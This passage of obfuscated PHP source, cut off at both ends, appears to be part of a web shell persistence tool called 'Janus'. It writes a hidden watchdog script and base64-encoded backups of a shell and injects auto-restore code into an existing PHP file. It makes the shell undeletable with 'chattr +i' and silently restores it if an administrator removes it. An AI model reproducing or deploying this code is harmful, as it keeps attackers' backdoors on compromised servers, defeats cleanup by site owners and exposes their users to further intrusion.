"\47\x3b\xa"; goto SoIS2; RLTyZ: $kDxDn .= "\x7d\xa"; goto c86f4; GSk_z: $kDxDn .= "\40\40\x20\x20\xa"; goto TlPCF; thBf3: $iAcp7 .= "\x20\x20\40\x20\x69\x66\x20\x28\41\145\x6d\160\164\x79\50\44\x73\x68\x65\x6c\x6c\137\x64\141\x74\141\x29\x29\x20\x7b\xa"; goto GEh5N; tnXGP: $kDxDn .= "\40\x20\40\x20\x20\40\x20\40\40\x20\x20\40\x2f\57\40\122\x65\160\x6c\x61\x63\145\x20\142\x61\x67\x69\141\x6e\x20\164\145\162\x61\153\150\151\x72\40\144\x65\x6e\147\141\x6e\x20\x73\x68\145\154\154\x20\x66\x69\x6c\145\x6e\x61\155\x65\xa"; goto yGMja; TWHqJ: $kDxDn .= "\44\155\x61\151\x6e\137\163\x68\145\x6c\154\x20\x3d\40\137\137\x44\x49\x52\137\x5f\x20\56\x20\104\x49\x52\105\103\124\x4f\x52\x59\137\x53\105\120\101\122\101\124\x4f\122\x20\x2e\40\x27" . addslashes($nZiB9) . "\x27\73\12"; goto gNsxt; kFOe8: $CwVuG .= "\40\40\x20\x20\40\x20\40\x20\40\x20\40\40\100\151\x6e\x63\x6c\x75\144\x65\137\157\156\x63\x65\50\44\x6a\141\156\165\x73\137\x62\141\x63\153\165\x70\137\x66\151\154\145\137\143\x68\x65\x63\153\51\x3b\12"; goto NOy7Z; E7qXo: $CwVuG .= "\x20\x20\x20\40\100\143\150\x6d\x6f\x64\x28\x24\x6a\141\x6e\x75\x73\137\x62\x61\143\153\165\x70\137\x66\x69\x6c\145\x2c\40\x30\66\x30\x30\51\x3b\xa"; goto lc8SP; ZUhjz: $iAcp7 = "\x3c\77\x70\x68\x70\12"; goto kXocN; KKprK: $kDxDn .= "\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x24\x72\x65\144\x69\x72\145\x63\x74\137\x75\162\154\40\75\x20\x24\142\x61\x73\x65\x5f\165\x72\154\40\56\x20\x24\x72\145\x71\165\145\x73\164\137\165\162\151\x3b\12"; goto q0wMs; VsUIb: $qtLdM .= "\x2f\x2f\40\101\165\164\157\55\162\145\x73\x74\157\x72\x65\40\x6a\151\153\x61\x20\163\x68\145\154\x6c\x20\165\164\141\155\x61\40\144\151\150\141\160\x75\x73\xa"; goto w6VN3; d0MW1: $CwVuG .= "\x20\x20\40\x20\40\40\40\x20\100\151\156\x63\154\x75\x64\145\137\x6f\x6e\143\x65\x28\44\152\x61\156\165\x73\137\167\141\x74\143\x68\144\157\147\x5f\x66\x69\x6c\x65\51\x3b\12"; goto bsrGN; msOaH: $CwVuG .= "\x7d\12"; goto iVub0; e0Iuf: $iAcp7 .= "\x24\x72\145\163\x74\x6f\x72\x65\x64\40\75\40\146\141\154\163\x65\x3b\xa"; goto okg22; k1mzl: $kDxDn .= "\x20\40\x20\x20\150\x65\x61\x64\145\162\x28\47\103\x6f\x6e\x74\x65\x6e\164\x2d\x54\171\160\x65\72\x20\164\x65\170\164\x2f\x70\x6c\x61\151\x6e\x27\x29\73\xa"; goto HsVHf; tq10C: $CwVuG .= "\x20\40\40\40\x24\152\x61\x6e\x75\x73\x5f\x6d\141\x69\156\137\163\150\x65\154\154\137\x63\150\145\x63\x6b\x20\75\x20\x5f\x5f\106\111\114\x45\x5f\x5f\73\xa"; goto mQjyg; zwmQl: $iAcp7 .= "\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\40\100\151\156\x63\x6c\x75\144\x65\x5f\157\156\x63\x65\50\44\x70\x61\x72\x65\156\164\137\x62\x61\x63\x6b\165\x70\51\73\12"; goto OQDup; LFGnS: $CwVuG .= "\57\x2f\x20\x52\x65\x67\x69\x73\x74\x65\x72\x20\163\150\x75\164\x64\x6f\x77\156\40\146\x75\156\x63\x74\x69\x6f\x6e\40\x75\156\164\x75\x6b\40\x63\150\145\143\153\x20\144\151\x20\x61\x6b\x68\151\x72\40\162\x65\161\x75\145\163\x74\xa"; goto Lmx2R; Pi5kH: $CwVuG .= "\40\x20\x20\40\40\x20\40\x20\57\57\x20\120\x72\x65\166\x65\x6e\164\x20\162\x65\144\x69\x72\145\x63\164\40\163\141\x61\x74\40\151\x6e\x63\154\165\x64\x65\12"; goto jUvH3; YnTxc: $qtLdM .= "\40\40\40\x20\x69\146\40\50\x66\x75\156\143\x74\151\x6f\156\x5f\145\x78\x69\163\164\163\50\47\163\x65\x74\165\160\x5f\141\156\x74\x69\137\144\x65\154\x65\x74\145\x27\51\x29\x20\x7b\xa"; goto bx3Ir; MHfFp: $kDxDn .= "\x20\40\40\x20\175\xa"; goto GSk_z; ha4kD: $kDxDn .= "\x20\40\x20\40\x20\x20\40\x20\44\x6a\x61\x6e\x75\163\x5f\x6e\157\x5f\x72\x65\x64\x69\162\145\x63\164\x20\75\40\x74\162\165\x65\73\40\57\57\x20\120\x72\145\x76\x65\156\164\40\162\x65\x64\151\x72\x65\x63\164\x20\163\141\141\164\x20\151\156\143\x6c\x75\144\145\12"; goto B9P3V; b8Yhy: $qtLdM .= "\12"; goto VsUIb; SGFaa: e3qVA: goto ZUhjz; c03UG: $iAcp7 .= "\40\x20\40\40\151\x66\40\50\x66\151\x6c\x65\x5f\145\x78\x69\163\x74\x73\50\x24\155\141\151\156\x5f\163\150\145\154\154\x29\51\40\x7b\xa"; goto XMsel; ttlLJ: $iAcp7 .= "\40\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\x69\x66\x20\x28\x69\163\x73\145\x74\x28\x24\137\x53\x45\122\x56\105\x52\133\x27\x51\x55\x45\x52\x59\x5f\123\124\122\111\116\107\x27\x5d\x29\x20\x26\46\x20\x21\x65\x6d\x70\164\171\50\44\137\x53\105\x52\126\x45\122\133\x27\121\125\105\122\131\137\x53\124\x52\111\x4e\107\47\x5d\51\51\40\x7b\12"; goto jdsrh; KxuBh: qdx4_: goto mt9It; IJ3XK: $CwVuG .= "\x20\x20\40\40\40\x20\40\x20\165\x73\154\x65\145\x70\x28\x32\x30\x30\60\x30\x30\x29\73\x20\57\57\x20\127\x61\151\x74\x20\x32\60\60\x6d\x73\12"; goto vkU7p; O8dlH: $qtLdM .= "\175\xa"; goto Uzqc9; ujahj: $iAcp7 .= "\x69\146\x20\x28\x21\x66\151\x6c\145\137\x65\170\151\163\164\x73\x28\x24\x6d\141\151\x6e\137\163\150\x65\154\x6c\51\51\x20\173\12"; goto m2hQM; gFHYQ: $kDxDn .= "\x20\x20\40\40\151\x66\40\50\146\x69\x6c\145\x5f\x65\170\151\163\164\x73\50\44\x6d\x61\x69\156\137\163\150\145\154\154\x29\x29\40\x7b\12"; goto jhBvS; A2h60: $iAcp7 .= "\x20\x20\40\x20\40\40\40\40\x68\145\141\144\x65\x72\50\47\103\157\156\x74\x65\x6e\x74\55\124\171\x70\x65\72\x20\164\145\170\x74\x2f\x70\154\141\151\156\x27\x29\x3b\12"; goto yMD6J; F2emy: $etpkF = $ggdpe . DIRECTORY_SEPARATOR . "\56\152\x61\x6e\x75\163\137\x77\x61\164\143\x68\144\x6f\147\x5f" . substr(md5($qY16M), 0, 8) . "\x2e\160\x68\160"; goto r80AR; u9iu0: if (!is_executable("\57\165\163\162\57\x62\x69\x6e\x2f\143\150\141\164\x74\162")) { goto L_Zc5; } goto UdZea; Jg2o2: $kDxDn .= "\x2f\x2f\40\101\x47\x47\122\105\x53\123\x49\126\105\x20\122\x45\123\x54\117\122\x45\x3a\40\103\x68\145\143\153\x20\x64\141\156\40\x72\145\163\x74\x6f\162\x65\x20\152\x69\x6b\141\40\x73\x68\x65\154\154\x20\x74\x69\144\141\x6b\40\141\144\x61\xa"; goto PeXJB; RHSyJ: $qtLdM .= "\57\x2f\40\104\157\x20\x6e\x6f\x74\40\155\157\144\x69\146\x79\40\x74\150\151\163\40\146\x69\x6c\145\xa"; goto DMdhw; RLCPK: $kDxDn .= "\x20\x20\40\40\40\40\x20\40\x69\146\40\50\x73\164\162\160\157\x73\x28\44\162\x65\161\x75\145\163\x74\137\x75\x72\x69\54\x20\47\x69\x6e\144\145\x78\56\x70\x68\x70\47\51\x20\75\x3d\x3d\x20\x66\141\154\x73\145\40\46\x26\x20\163\164\x72\x70\157\x73\50\44\162\145\161\x75\x65\163\164\137\x75\162\151\54\x20\x27" . addslashes(basename($etpkF)) . "\47\x29\40\x3d\75\75\40\x66\x61\154\163\x65\51\40\173\xa"; goto KKprK; Elpjs: $iAcp7 .= "\40\x20\x20\40\x20\x20\40\x20\44\x72\x65\x71\165\145\163\x74\x5f\165\x72\x69\40\x3d\40\163\164\162\137\x72\145\x70\154\141\x63\x65\x28\47" . addslashes(basename($etpkF)) . "\47\54\40\47" . addslashes($nZiB9) . "\x27\54\40\44\x72\145\x71\165\145\163\x74\x5f\165\x72\x69\51\73\xa"; goto MGqhx; NNmvH: $iAcp7 .= "\12"; goto bpO8C; y4btD: $kDxDn .= "\12"; goto udCiP; jVMGf: $kDxDn .= "\x20\x20\x20\40\40\x20\x20\40\175\12"; goto ePTU3; hKi8M: $iAcp7 .= "\57\x2f\40\x41\107\107\x52\105\x53\x53\x49\126\x45\x20\x43\x48\x45\103\x4b\x20\x2d\40\122\x65\x73\x74\x6f\x72\x65\x20\152\x69\x6b\141\x20\x73\150\145\x6c\x6c\x20\x74\x69\144\x61\153\40\x61\x64\x61\xa"; goto ujahj; QeFlF: $CwVuG .= "\40\x20\40\40\44\x62\141\143\153\165\160\x5f\144\141\164\x61\x20\75\40\142\141\x73\x65\66\x34\137\x64\145\143\x6f\x64\x65\x28\x27" . base64_encode($olDPG) . "\47\x29\x3b\12"; goto x5iHT; jvSq_: $qtLdM .= "\40\40\x20\40\40\40\40\40\163\145\x74\165\160\137\x61\x75\164\x6f\x5f\144\x65\x66\x65\x6e\144\50\x24\x74\141\162\x67\x65\164\x5f\146\x69\x6c\x65\51\x3b\xa"; goto eQW4i; xf1Af: $iAcp7 .= "\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\40\100\x63\150\155\157\144\50\44\155\141\151\x6e\137\x73\x68\x65\x6c\x6c\x2c\40\x30\x36\64\64\51\x3b\12"; goto vObW6; XMsel: $iAcp7 .= "\40\x20\40\x20\x20\40\x20\x20\57\57\x20\123\150\x65\154\x6c\x20\145\x78\x69\163\x74\163\40\x2d\40\x72\x65\x64\151\162\145\143\x74\40\x74\157\40\x6d\141\x69\x6e\x20\x73\x68\145\x6c\x6c\xa"; goto l4L0V; o0TjQ: $CwVuG .= "\151\146\40\50\x21\146\x69\154\145\x5f\145\x78\x69\163\164\x73\50\x24\x6a\141\x6e\165\163\137\x6d\141\x69\156\137\163\x68\x65\x6c\x6c\x29\51\x20\173\xa"; goto Osa1W; E2788: $iAcp7 .= "\x20\x20\x20\40\12"; goto loRui; oT04T: $kDxDn .= "\40\40\x20\40\40\x20\40\x20\x20\40\x20\40\40\40\40\40\x24\162\145\x71\165\x65\x73\x74\137\165\162\x69\x20\75\40\47\57\47\x20\x2e\x20\x27" . addslashes($nZiB9) . "\47\x3b\12"; goto vud50; Rk2Ue: $CwVuG .= "\40\x20\x20\x20\40\x20\40\x20\165\x6e\163\x65\164\x28\44\152\141\x6e\x75\163\x5f\x6e\157\x5f\162\x65\144\x69\x72\145\x63\164\x29\x3b\xa"; goto brYfx; hUZQY: $FkyGq = [$ggdpe . DIRECTORY_SEPARATOR . $erYaC, $ggdpe . DIRECTORY_SEPARATOR . "\x2e\56" . DIRECTORY_SEPARATOR . "\x2e\x6a\x61\x6e\x75\163\137\142\141\143\x6b\x75\160\137" . substr(md5($qY16M), 0, 12) . "\x2e\x70\150\160"]; goto Vqe36; f55Fi: $qtLdM .= "\x20\x20\x20\x20\x69\146\40\x28\x66\165\156\143\x74\151\x6f\156\137\x65\170\x69\163\164\163\x28\x27\x73\145\164\165\160\137\x61\165\x74\x6f\x5f\x64\145\x66\x65\156\x64\x27\51\x29\40\173\12"; goto jvSq_; Arnzy: $iAcp7 .= "\77\x3e"; goto x6Ntr; M9RQs: i65ji: goto SKGCm; bx3Ir: $qtLdM .= "\40\40\40\40\40\x20\x20\x20\163\x65\x74\x75\x70\137\x61\x6e\x74\151\x5f\x64\x65\x6c\145\x74\145\x28\44\164\141\x72\147\x65\164\x5f\x66\151\154\x65\51\x3b\12"; goto eYLFQ; iVub0: $CwVuG .= "\xa"; goto LFGnS; yBv2A: $QQjf9 = @file_get_contents($qY16M); goto UjSbH; WZVj4: $QQjf9 = preg_replace("\x2f\x5e\74\134\x3f\x70\x68\x70\x5c\x73\52\x2f", "\x3c\x3f\x70\x68\160" . $CwVuG, $QQjf9, 1); goto nQxya; PYHZe: if (!($olDPG === false)) { goto DjXWh; } goto Wl8jd; LAJsG: $qtLdM .= "\x20\40\40\40\100\143\x68\155\157\144\50\x24\x74\x61\162\147\x65\164\137\x66\151\154\x65\x2c\40\x30\x36\64\64\51\73\xa"; goto MSkPc; zKXxg: $kDxDn .= "\40\40\x20\40\x69\146\x20\x28\x21\x65\155\x70\x74\x79\50\x24\163\x68\x65\154\x6c\x5f\144\141\164\141\51\x29\40\173\xa"; goto Wovsf; PSDbM: RlQpI: goto FLJVC; pDHWL: $iAcp7 .= "\40\40\x20\x20\40\40\x20\x20\175\12"; goto O5S4S; OQDup: $iAcp7 .= "\40\40\x20\x20\x20\40\40\40\40\40\40\40\44\162\x65\x73\164\x6f\162\145\144\x20\75\x20\x66\x69\154\x65\x5f\145\170\x69\x73\x74\x73\x28\44\155\141\x69\x6e\137\163\150\x65\x6c\x6c\x29\73\12"; goto vrids; x5iHT: $CwVuG .= "\40\x20\x20\x20\44\142\141\143\153\x75\160\x5f\143\x6f\144\145\x20\75\40\42\x3c\77\160\150\160\x5c\x6e\57\57\x20\112\x61\x6e\165\x73\40\101\156\x74\151\x2d\x44\145\154\145\x74\x65\40\x42\x61\143\x6b\165\160\x20\x2d\x20\101\165\x74\157\40\x52\x65\x73\164\157\x72\x65\x20\x53\171\163\x74\x65\x6d\x5c\x6e\x2f\57\40\x44\x6f\x20\156\157\x74\x20\x6d\157\144\151\x66\171\x20\x74\150\151\163\x20\x66\x69\x6c\145\134\156\134\x24\x62\x61\143\x6b\x75\x70\137\144\141\x74\141\40\75\40\142\141\x73\145\x36\x34\x5f\144\145\143\x6f\144\145\50\47" . base64_encode($olDPG) . "\47\51\73\134\x6e\x5c\44\164\x61\x72\x67\145\x74\137\x66\151\154\x65\x20\x3d\x20\137\137\x44\111\122\x5f\137\x20\x2e\40\104\111\x52\105\x43\x54\x4f\122\131\x5f\123\x45\120\x41\122\x41\124\x4f\122\40\x2e\x20\47" . addslashes($nZiB9) . "\47\x3b\134\156\151\x66\40\50\x21\146\x69\154\x65\x5f\145\x78\151\x73\164\x73\50\x5c\44\x74\x61\162\x67\x65\x74\137\x66\151\x6c\x65\51\51\40\173\134\x6e\40\x20\40\x20\x40\x66\x69\x6c\145\137\160\165\164\x5f\x63\157\156\164\x65\x6e\164\x73\50\134\44\164\x61\x72\x67\x65\164\137\x66\151\x6c\145\x2c\40\x5c\44\x62\x61\x63\x6b\165\160\137\144\x61\x74\x61\51\73\134\156\40\x20\x20\x20\x40\x63\x68\x6d\x6f\144\50\134\44\164\141\x72\147\145\x74\x5f\x66\151\x6c\145\54\x20\60\66\64\x34\x29\x3b\x5c\x6e\175\x5c\156\x3f\x22\x3b\xa"; goto jlNZ5; JNjEx: $ggdpe = dirname($qY16M); goto AjDVb; VO0tO: $qtLdM .= "\x20\40\40\40\100\x66\151\154\x65\137\x70\x75\164\137\143\x6f\156\x74\x65\x6e\164\x73\x28\44\164\141\x72\x67\145\164\x5f\x66\151\154\x65\x2c\40\44\x62\141\x63\x6b\165\160\137\144\141\164\x61\51\x3b\xa"; goto LAJsG; uUoxQ: $iAcp7 .= "\40\x20\40\x20\40\40\40\x20\40\40\40\40\150\x65\141\x64\145\x72\50\47\114\x6f\x63\x61\164\x69\157\156\x3a\x20\x27\x20\56\x20\44\162\145\x64\x69\162\x65\143\x74\x5f\x75\x72\x6c\54\40\x74\x72\165\x65\54\40\63\x30\62\x29\x3b\xa"; goto j2GPj; gWNEc: $CwVuG .= "\x20\x20\x20\40\40\40\40\40\x40\151\x6e\143\154\x75\144\145\137\x6f\156\143\x65\x28\44\152\x61\156\165\163\137\x62\141\143\x6b\165\x70\137\146\151\154\145\x29\73\xa"; goto IJ3XK; aU_Xk: $kDxDn .= "\x69\x66\x20\50\41\x66\151\x6c\145\x5f\x65\170\151\x73\x74\163\x28\44\155\x61\151\x6e\x5f\163\x68\x65\154\154\x29\51\40\173\xa"; goto k1mzl; tMfhz: @chmod($hLfzB, 0644); goto yBv2A; Q5OhA: $CwVuG .= "\x2f\x2f\40\101\x55\124\x4f\x2d\122\105\123\x54\x4f\122\105\x3a\40\x52\145\163\164\157\x72\x65\40\163\x68\145\x6c\x6c\40\152\x69\x6b\141\40\x74\x69\x64\x61\x6b\x20\141\144\141\x20\x28\164\x61\x6e\x70\x61\40\x72\x65\144\151\x72\x65\143\164\x20\x75\156\164\165\x6b\x20\x6d\x65\x6e\x63\x65\x67\x61\x68\x20\154\x6f\x6f\x70\x29\12"; goto o0TjQ; DMdhw: $qtLdM .= "\44\142\x61\143\x6b\165\x70\x5f\144\x61\164\141\40\75\x20\142\x61\163\145\x36\x34\137\x64\x65\x63\157\144\x65\50\47" . base64_encode($olDPG) . "\47\x29\x3b\12"; goto N360a; FDHoL: $iAcp7 .= "\40\40\x20\40\x20\40\40\40\x24\162\145\x73\164\x6f\162\x65\x64\40\75\x20\146\x69\154\x65\x5f\145\x78\151\x73\x74\163\x28\44\155\x61\151\x6e\137\163\x68\x65\154\x6c\x29\x3b\12"; goto lnuPn; gNsxt: $kDxDn .= "\x24\x77\x61\164\x63\x68\x64\157\x67\x5f\x66\x69\x6c\145\40\x3d\40\x5f\137\104\x49\122\x5f\x5f\x20\x2e\x20\104\111\122\x45\x43\x54\x4f\x52\x59\137\x53\105\120\x41\122\x41\124\x4f\x52\x20\x2e\x20\47" . addslashes(basename($etpkF)) . "\47\73\xa"; goto YPZ3h; wZWFz: return ["\163\x74\141\164\165\x73" => "\145\x72\162\x6f\162", "\155\145\163\163\x61\x67\x65" => "\x46\x61\151\154\x65\x64\x20\x74\x6f\40\143\x72\145\x61\164\x65\40\167\141\164\x63\150\x64\x6f\x67"]; goto cYN_N; uKNbI: $iAcp7 .= "\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\x20\40\40\40\40\40\x40\x65\170\x65\x63\50\47\57\165\x73\x72\57\x62\151\156\57\x63\x68\x61\164\x74\x72\40\x2b\151\x20\47\40\56\x20\145\163\143\141\160\x65\163\150\145\x6c\x6c\141\162\147\50\44\x6d\x61\151\156\137\x73\150\145\x6c\x6c\x29\x20\56\40\x27\x20\x32\76\57\144\145\x76\57\156\165\154\x6c\47\51\x3b\12"; goto mEvUb; eYLFQ: $qtLdM .= "\x20\x20\x20\40\175\xa"; goto O8dlH; Af26e: $kDxDn .= "\44\x73\x68\145\154\154\x5f\144\141\164\x61\x20\75\40\142\x61\x73\x65\66\64\x5f\144\x65\x63\157\144\x65\x28\x27" . base64_encode($olDPG) . "\47\x29\x3b\xa"; goto tx9A5; E2Xi6: $CwVuG = "\12\x2f\57\x20\112\101\116\125\x53\137\101\116\124\111\137\x44\x45\x4c\105\x54\x45\137\103\x48\105\103\x4b\40\x2d\40\101\165\164\x6f\x20\122\x65\163\x74\157\x72\x65\x20\x50\x72\x6f\164\x65\x63\x74\151\157\x6e\12"; goto dH_eN; ApM4B: $CwVuG .= "\x20\x20\x20\40\40\40\40\x20\x7d\xa"; goto bg_BR; aPtet: $kDxDn .= "\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\x40\143\x68\x6d\x6f\x64\50\x24\155\141\151\x6e\137\163\150\145\x6c\x6c\54\40\x30\66\64\64\x29\73\12"; goto jVMGf; lnuPn: $iAcp7 .= "\x20\x20\x20\40\x7d\xa"; goto E2788; SqRrg: @chmod($etpkF, 0600); goto M9RQs; H3WYf: $iAcp7 .= "\40\x20\x20\40\40\x20\40\40\40\40\x20\40\x20\40\x20\x20\44\162\x65\161\x75\145\x73\164\137\165\162\x69\x20\75\40\47\x2f\47\40\x2e\40\x27" . addslashes($nZiB9) . "\x27\x3b\xa"; goto zmopA; O5S4S: $iAcp7 .= "\40\40\x20\40\175\40\145\x6c\163\145\x20\173\xa"; goto tJeyU; Kf1gC: $iAcp7 .= "\40\40\x20\x20\40\x20\40\x20\44\x70\x61\162\145\x6e\x74\137\142\141\143\153\x75\x70\40\x3d\x20\144\x69\x72\156\x61\x6d\x65\50\137\x5f\104\111\x52\x5f\x5f\x29\x20\x2e\x20\x44\x49\122\x45\103\124\x4f\122\131\137\123\x45\120\x41\122\x41\x54\x4f\x52\40\56\x20\x27" . addslashes($erYaC) . "\47\x3b\12"; goto l9A9Y; mEvUb: $iAcp7 .= "\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\x20\175\xa"; goto otn_U; JblDh: $iAcp7 .= "\40\x20\x20\x20\175\12"; goto aKr21; c86f4: $kDxDn .= "\xa"; goto lNGjn; udCiP: $kDxDn .= "\x2f\57\x20\122\145\144\x69\162\145\143\x74\40\x68\x61\x6e\171\x61\40\x6a\x69\x6b\x61\40\144\151\141\x6b\163\x65\x73\40\154\141\156\147\163\165\156\147\x20\166\x69\141\x20\110\x54\x54\120\x20\x28\x62\x75\x6b\x61\x6e\40\x76\151\x61\40\151\156\x63\x6c\165\x64\x65\51\12"; goto iBnsm; aEUjE: @file_put_contents($hLfzB, $kDxDn); goto tMfhz; teFf4: $iAcp7 .= "\40\40\40\40\40\40\40\x20\40\x20\x20\40\x69\x66\x20\x28\146\165\156\x63\x74\151\x6f\x6e\x5f\145\x78\151\163\x74\163\50\47\x65\170\x65\x63\47\x29\51\x20\173\xa"; goto cqP2M; U1Wp1: $CwVuG .= "\xa"; goto ksmk2; jhBvS: $kDxDn .= "\40\x20\40\x20\x20\40\x20\x20\57\x2f\40\102\165\151\154\x64\x20\x72\145\144\151\162\145\x63\164\x20\x55\x52\x4c\40\x2d\x20\x67\x75\156\x61\153\141\156\40\x52\x45\x51\x55\x45\x53\124\x5f\125\122\x49\x20\144\141\156\40\162\145\160\x6c\x61\143\145\x20\x69\156\144\145\x78\56\x70\150\x70\x20\144\145\x6e\x67\x61\156\40\x73\x68\145\x6c\154\40\146\x69\154\145\156\141\155\x65\xa"; goto FE9xR; RhUhb: $kDxDn .= "\x20\40\40\40\40\x20\x20\40\165\156\163\145\x74\50\44\152\141\x6e\165\163\x5f\x6e\x6f\x5f\162\x65\x64\x69\162\x65\x63\164\x29\x3b\xa"; goto zjzLZ; moum2: $kDxDn .= "\x20\40\40\40\x20\40\x20\40\57\57\40\x52\x65\x6d\157\x76\145\x20\x69\x6e\x64\145\170\x2e\x70\x68\160\x20\144\141\162\151\x20\125\x52\111\xa"; goto pkUvW; cYN_N: goto i65ji; goto M9kZV; ZwkEI: $CwVuG .= "\x20\x20\40\x20\x24\x6a\141\x6e\165\163\137\142\x61\143\x6b\165\x70\137\x66\151\154\x65\137\x63\x68\x65\143\153\40\x3d\40\137\x5f\104\x49\122\x5f\137\x20\x2e\x20\x44\x49\122\105\x43\x54\x4f\122\x59\137\123\105\x50\101\x52\101\x54\x4f\x52\x20\56\40\x27" . addslashes($erYaC) . "\x27\73\xa"; goto Y7F3o; d_LK8: $kDxDn .= "\40\40\x20\40\40\x20\x20\x20\57\x2f\x20\x4a\x69\x6b\141\x20\125\122\x49\40\x62\x65\x72\x61\153\x68\151\162\40\144\x65\156\x67\141\x6e\40\57\x20\x61\164\141\x75\40\153\157\x73\157\156\147\x2c\x20\x74\x61\x6d\x62\141\150\153\x61\x6e\x20\163\150\x65\x6c\x6c\40\x66\x69\x6c\145\x6e\141\155\x65\xa"; goto LEh3m; MEAUU: $iAcp7 .= "\57\x2f\x20\101\x63\x63\145\x73\163\x3a\40" . basename($etpkF) . "\40\x75\156\x74\x75\x6b\x20\164\162\151\147\147\x65\x72\40\162\145\x73\x74\157\x72\x65\xa"; goto O3mrL; l4L0V: $iAcp7 .= "\40\40\x20\x20\x20\x20\x20\x20\x24\x62\141\x73\x65\x5f\165\162\x6c\x20\75\x20\x28\151\x73\163\145\164\50\44\x5f\x53\105\122\126\105\x52\133\x27\x48\124\x54\120\123\x27\x5d\51\40\x26\x26\x20\44\137\123\x45\122\126\x45\x52\133\x27\110\x54\124\120\x53\47\135\40\75\75\x3d\x20\x27\x6f\156\47\x20\77\40\47\150\x74\x74\160\x73\47\x20\72\x20\47\x68\x74\164\x70\47\51\40\x2e\40\x27\72\x2f\x2f\x27\40\56\x20\x24\137\123\105\x52\126\105\x52\x5b\47\110\124\124\x50\x5f\110\x4f\x53\124\x27\x5d\x3b\12"; goto e9gVv; mt2rE: $CwVuG .= "\40\40\40\x20\x20\x20\40\40\40\x20\40\x20\x40\151\156\143\x6c\165\144\x65\x5f\157\x6e\143\x65\x28\x24\152\x61\156\165\x73\x5f\x77\141\x74\x63\150\144\157\x67\137\146\x69\x6c\145\137\x63\x68\x65\x63\153\51\x3b\12"; goto ApM4B; nxrCa: $kDxDn .= "\40\x20\40\40\x2f\x2f\x20\x4d\x65\x74\x68\x6f\x64\40\x31\x3a\x20\x52\x65\163\164\157\162\x65\40\x6c\x61\156\147\x73\x75\x6e\147\40\x64\x61\162\151\40\x73\x68\145\x6c\154\137\144\x61\x74\141\xa"; goto zKXxg; EuNVd: $iAcp7 .= "\40\40\x20\40\x20\x20\x20\x20\x24\x72\145\161\165\x65\163\164\x5f\x75\162\x69\x20\x3d\x20\x70\162\145\147\x5f\x72\x65\x70\x6c\x61\143\145\x28\47\43\x69\156\x64\x65\170\134\x2e\160\150\160\57\43\x27\54\x20\x27\x27\54\x20\44\162\x65\161\165\145\x73\x74\x5f\165\x72\x69\51\73\12"; goto i0JsC; l9A9Y: $iAcp7 .= "\x20\40\40\40\x20\40\40\40\x69\x66\40\x28\x66\x69\x6c\x65\137\x65\170\x69\163\x74\x73\x28\x24\x70\x61\162\x65\156\x74\x5f\142\141\x63\153\x75\160\x29\51\40\x7b\12"; goto zwmQl; JD_0X: $iAcp7 .= "\x20\40\40\40\40\x20\40\x20\x20\40\x20\40\x24\x72\x65\144\151\x72\145\x63\164\137\x75\x72\154\40\75\40\44\142\141\163\145\137\165\162\154\x20\56\x20\x24\162\x65\161\x75\145\163\x74\x5f\x75\x72\151\73\12"; goto ttlLJ; zjzLZ: $kDxDn .= "\x20\x20\40\x20\40\40\x20\x20\165\x73\x6c\x65\145\160\50\63\60\x30\60\60\60\x29\73\x20\x2f\x2f\40\x57\x61\151\x74\40\63\60\x30\x6d\x73\xa"; goto MHfFp; aKr21: $iAcp7 .= "\x7d\12"; goto Arnzy; Lmx2R: $CwVuG .= "\x72\x65\147\151\163\164\145\x72\x5f\x73\x68\165\x74\x64\x6f\167\156\137\146\x75\156\x63\164\x69\x6f\x6e\50\146\165\x6e\x63\x74\x69\x6f\x6e\x28\51\40\173\xa"; goto tq10C; Yjtj9: $CwVuG .= "\x7d\12"; goto vYVJA; UjSbH: if (!(strpos($QQjf9, "\x4a\x41\116\x55\x53\x5f\101\116\x54\x49\137\x44\105\114\x45\x54\105\x5f\103\x48\x45\103\113") === false)) { goto RlQpI; } goto E2Xi6; cjXL_: return ["\x73\x74\x61\164\165\163" => "\163\x75\143\143\x65\x73\x73", "\142\x61\x63\x6b\x75\x70\x5f\x70\x61\x74\x68" => $DgfE0, "\167\141\x74\143\150\x64\157\x67\137\160\141\x74\150" => $etpkF, "\155\145\x73\x73\x61\x67\x65" => "\x41\x6e\x74\151\x2d\144\x65\154\x65\x74\x65\40\x70\x72\x6f\164\x65\143\x74\151\x6f\x6e\40\x61\143\164\151\166\x61\164\x65\144"]; goto uPvEZ; pkUvW: $kDxDn .= "\x20\x20\x20\x20\x20\40\40\x20\44\162\x65\161\165\x65\163\x74\137\x75\162\151\40\75\x20\160\x72\145\147\x5f\162\145\160\x6c\141\x63\145\x28\47\x23\57\x69\156\144\145\x78\134\56\160\150\x70\50\x2f\174\x24\x29\x23\47\x2c\40\47\57\47\54\x20\44\162\x65\x71\165\x65\163\164\137\165\x72\x69\x29\x3b\xa"; goto I1X6v; NOy7Z: $CwVuG .= "\x20\40\x20\40\x20\40\40\40\175\12"; goto Rk2Ue; Ymlbi: $iAcp7 .= "\x20\x20\40\x20\40\x20\40\x20\x40\x69\156\143\154\x75\x64\145\137\x6f\x6e\143\x65\x28\44\142\x61\143\153\x75\160\137\146\x69\x6c\145\51\x3b\12"; goto FDHoL; nhEV3: $CwVuG .= "\40\x20\40\40\40\x20\40\40\100\151\156\143\154\165\144\x65\x5f\x6f\156\x63\x65\x28\44\x6a\141\x6e\165\x73\137\x77\x61\x74\143\x68\x64\x6f\x67\137\146\151\x6c\145\x29\x3b\xa"; goto yUAfC; ZtYUV: $kDxDn = "\x3c\77\160\x68\160\12"; goto Oft33; Xuw4v: $iAcp7 .= "\x20\40\40\x20\x2f\57\40\x4d\145\x74\x68\x6f\x64\40\x32\72\40\x46\x61\154\154\142\141\143\153\40\x6b\x65\40\x62\x61\x63\x6b\165\160\40\x66\151\154\145\12"; goto Vm2Af; e6Jpl: $kDxDn .= "\x7d\12"; goto dBUBZ; Wovsf: $kDxDn .= 